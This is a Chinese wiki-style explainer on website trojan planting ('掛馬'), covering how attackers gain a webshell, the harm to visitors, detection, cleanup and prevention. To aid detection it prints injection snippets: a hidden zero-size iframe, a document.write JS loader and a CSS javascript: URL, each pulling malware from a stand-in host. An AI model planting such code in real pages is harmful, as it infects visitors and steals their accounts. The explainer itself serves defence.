編輯“掛馬”

所謂的掛馬，就是黑客通過各種手段，包括[[SQL]]注入，網(wǎng)站敏感文件掃描，[[服務(wù)器]]漏洞，網(wǎng)站程序0day, 等各種方法獲得網(wǎng)站管理員賬號，然后登陸網(wǎng)站后臺，通過[[數(shù)據(jù)庫]] 備份/恢復(fù) 或者上傳漏洞獲得一個(gè)webshell。利用獲得的webshell修改網(wǎng)站頁面的內(nèi)容，向頁面中加入惡意轉(zhuǎn)向代碼。也可以直接通過弱口令獲得服務(wù)器或者網(wǎng)站[[FTP]]，然后直接對網(wǎng)站頁面直接進(jìn)行修改。當(dāng)你訪問被加入惡意代碼的頁面時(shí)，你就會(huì)自動(dòng)的訪問被轉(zhuǎn)向的地址或者下載[[木馬]]病毒。

==網(wǎng)頁掛馬的危害==
很多游戲網(wǎng)站被掛馬，黑客目的就是盜取瀏覽該網(wǎng)站玩家的游戲賬號，而那些大型網(wǎng)站被掛馬，則是為了搜集大量的肉雞。網(wǎng)站被掛馬不僅會(huì)讓自己的網(wǎng)站失去信譽(yù)，丟失大量客戶，也會(huì)讓我們這些普通用戶陷入黑客設(shè)下的陷阱，淪為黑客的肉雞。 　　如果不小心進(jìn)入了已被掛馬的網(wǎng)站，則會(huì)感染木馬病毒，以致丟失大量的寶貴文件資料和賬號密碼，其危害極大。

==如何分辨自己的網(wǎng)站是否被掛馬==
其實(shí)我們現(xiàn)在說的所謂的掛馬一般就是在那些可編輯文件下或是頭部加入一段代碼來實(shí)現(xiàn)跳轉(zhuǎn)到別的網(wǎng)站訪問那個(gè)他們指定的HTML網(wǎng)頁木馬的然后通過你電腦本身的漏洞攻破你的系統(tǒng)給你下載一個(gè)下載者，然后那下載者設(shè)定多少時(shí)間后開始在指定地點(diǎn)隱藏下載木馬并運(yùn)行。所以說我們只要把那段代碼給清理掉了就達(dá)到了清理掛馬的作用了。所以我們首先要辨別是不是自己的站是不是被掛馬。你如果打開網(wǎng)站發(fā)現(xiàn)很卡但是殺毒軟件沒報(bào)警別以為沒事了，很多馬很有可能做了免殺處理所以殺軟沒反映。我們打開網(wǎng)站點(diǎn)查看源代碼如果頂部或是底下出現(xiàn)了這樣的代碼就恭喜你種標(biāo)了。比如：
 <iframe src=http: //www.baidu/muma.html width=0 height=0></iframe> 　　
插入一個(gè)長和高都是0框架運(yùn)行,http: //www.baidu/muma.html這個(gè)頁面。

但是因?yàn)榭蚣艿拈L和高都是零你就沒辦法看到那個(gè)窗口了。但是如果你沒在頂部和底部發(fā)現(xiàn)這些代碼就以為沒事了，有的人還會(huì)在中間插入，只是在底部和頂部絕對不會(huì)影響到網(wǎng)站的整體結(jié)構(gòu)不用想那么多。但是如果那個(gè)掛馬的哥們稍微耐心一點(diǎn)多測試一下在網(wǎng)站代碼的中間還是很容易的。所以如果你代碼太多嫌找著麻煩的話你就可以直接在[[IE]]瀏覽器里點(diǎn)查看--隱私里看到底有沒有外連到別的站上去的站。有的話那很有可能被掛馬了。（如果你的站采集了的別人的圖片的話在隱私里會(huì)有連到別人那的哦，或是統(tǒng)計(jì)代碼也是，所以這要自己分析，哪些是正常的，哪些不是）！有的童鞋可能會(huì)說你這人真苯怎么不知道在源文件里直接查找<iframe這個(gè)呢。這樣快多了，但是我想說的是不是所有人都是用插入框架的方法掛馬的，方法可是有很多的哦，我就給大家列舉一下比如：

*js文件掛馬 　　

首先將以下代碼 　　
<pre>document.write("<iframe width='0' height='0' 
src='http //www.baidu/muma.htm'></iframe>"); 
</pre>
保存為xxx.js，
則JS掛馬代碼為
<pre><script language=javascript src=xxx.js></script>
</pre>
*css中掛馬 　　
<pre>body {
    background-image: url('javascript:document.write("<script 
    src=http: //www.baidu/muma.js></script>")')
 }
</pre>

==網(wǎng)站掛馬的具體恢復(fù)措施及預(yù)防==
'''恢復(fù)措施：'''
#整站被掛馬，最快速的恢復(fù)方法是，除開數(shù)據(jù)庫、上傳目錄之外，替換掉其他所有文件；
#仔細(xì)檢查網(wǎng)站上傳目錄存放的文件，很多木馬偽裝成圖片保存在上傳目錄，你直接把上傳文件夾下載到本地，用縮略圖的形式，查看是不是圖片，如果不顯示，則一律刪除；
#數(shù)據(jù)庫里面存在木馬，則把數(shù)據(jù)庫的木馬代碼清除。可以采用查找替換；
#如果網(wǎng)站源文件沒有，則需要FTP下載網(wǎng)站文件，然后再DW里面，用替換清除的方式一個(gè)個(gè)清除，注意網(wǎng)站的木馬數(shù)，如果被掛了很多不同的，必須多多檢查

'''預(yù)防措施 ：'''
#建議用戶通過ftp來上傳、維護(hù)網(wǎng)頁，盡量不安裝asp的上傳程序。
#對[[asp]]上傳程序的調(diào)用一定要進(jìn)行身份認(rèn)證，并只允許信任的人使用上傳程序。這其中包括各種新聞發(fā)布、商城及論壇程序，只要可以上傳文件的asp都要進(jìn)行身份認(rèn)證!
#asp程序管理員的用戶名和密碼要有一定復(fù)雜性，不能過于簡單，還要注意定期更換。
#到正規(guī)網(wǎng)站下載asp程序，下載后要對其數(shù)據(jù)庫名稱和存放路徑進(jìn)行修改，數(shù)據(jù)庫文件名稱也要有一定復(fù)雜性。
#要盡量保持程序是最新版本。
#不要在網(wǎng)頁上加注后臺管理程序登陸頁面的鏈接。
#為防止程序有未知漏洞，可以在維護(hù)后刪除后臺管理程序的登陸頁面，下次維護(hù)時(shí)再通過ftp上傳即可。
#要時(shí)常備份數(shù)據(jù)庫等重要文件。
#日常要多維護(hù)，并注意空間中是否有來歷不明的asp文件。記?。阂环趾顾?，換一分安全! 
#一旦發(fā)現(xiàn)被入侵，除非自己能識別出所有木馬文件，否則要?jiǎng)h除所有文件。
#定期對網(wǎng)站進(jìn)行安全的檢測，具體可以利用網(wǎng)上一些工具，如億思網(wǎng)站安全檢測平臺。

==相關(guān)條目==
*[[木馬]]
*[[病毒]]

==參考來源==
*http://baike.baidu.com/view/368.htm

[[category:網(wǎng)絡(luò)術(shù)語|G]]